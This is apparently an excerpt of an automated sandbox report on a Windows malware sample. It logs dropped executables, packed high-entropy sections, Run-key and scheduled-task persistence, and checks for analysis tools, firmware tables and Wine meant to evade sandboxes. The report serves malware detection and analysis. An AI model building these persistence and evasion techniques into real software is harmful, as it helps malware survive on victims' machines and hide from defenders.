Source: skotes.exe.4.dr Static PE information: section name: ibghtiqx entropy: 7.955004268197834
Source: random[1].exe.8.dr Static PE information: section name: entropy: 7.981161103585447
Source: c1b0009d40.exe.8.dr Static PE information: section name: entropy: 7.981161103585447
Source: random[1].exe0.8.dr Static PE information: section name: tnleqdlj entropy: 7.955054294676287
Source: 7a5878ed96.exe.8.dr Static PE information: section name: tnleqdlj entropy: 7.955054294676287
Source: DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe.9.dr Static PE information: section name: entropy: 7.793394171507594
Source: GCVLAW8OP2HD5YHJC3.exe.9.dr Static PE information: section name: entropy: 7.981331747856148
Source: GCVLAW8OP2HD5YHJC3.exe.9.dr Static PE information: section name: ibghtiqx entropy: 7.955004268197834
Source: I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe.11.dr Static PE information: section name: entropy: 7.793394171507594
Source: 1QL5CL9NMBWTM5JDZ.exe.11.dr Static PE information: section name: entropy: 7.981331747856148
Source: 1QL5CL9NMBWTM5JDZ.exe.11.dr Static PE information: section name: ibghtiqx entropy: 7.955004268197834
Source: E7HQ3XMUO6VYIDJ3F2DE2.exe.25.dr Static PE information: section name: entropy: 7.793394171507594
Source: EGCHWF62L351BCP5BKZSSW.exe.25.dr Static PE information: section name: entropy: 7.981331747856148
Source: EGCHWF62L351BCP5BKZSSW.exe.25.dr Static PE information: section name: ibghtiqx entropy: 7.955004268197834
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\num[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File created: C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File created: C:\Users\user\AppData\Local\Temp\EGCHWF62L351BCP5BKZSSW.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1002711001\num.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File created: C:\Users\user\AppData\Local\Temp\GCVLAW8OP2HD5YHJC3.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File created: C:\Users\user\AppData\Local\Temp\E7HQ3XMUO6VYIDJ3F2DE2.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File created: C:\Users\user\AppData\Local\Temp\I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File created: C:\Users\user\AppData\Local\Temp\1QL5CL9NMBWTM5JDZ.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Jump to dropped file

Boot Survival

barindex
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c1b0009d40.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1dc3787ee3.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 7a5878ed96.exe Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\GCVLAW8OP2HD5YHJC3.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\GCVLAW8OP2HD5YHJC3.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\GCVLAW8OP2HD5YHJC3.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\GCVLAW8OP2HD5YHJC3.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\GCVLAW8OP2HD5YHJC3.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1QL5CL9NMBWTM5JDZ.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1QL5CL9NMBWTM5JDZ.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1QL5CL9NMBWTM5JDZ.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1QL5CL9NMBWTM5JDZ.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1QL5CL9NMBWTM5JDZ.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c1b0009d40.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c1b0009d40.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 7a5878ed96.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 7a5878ed96.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1dc3787ee3.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1dc3787ee3.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\file.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
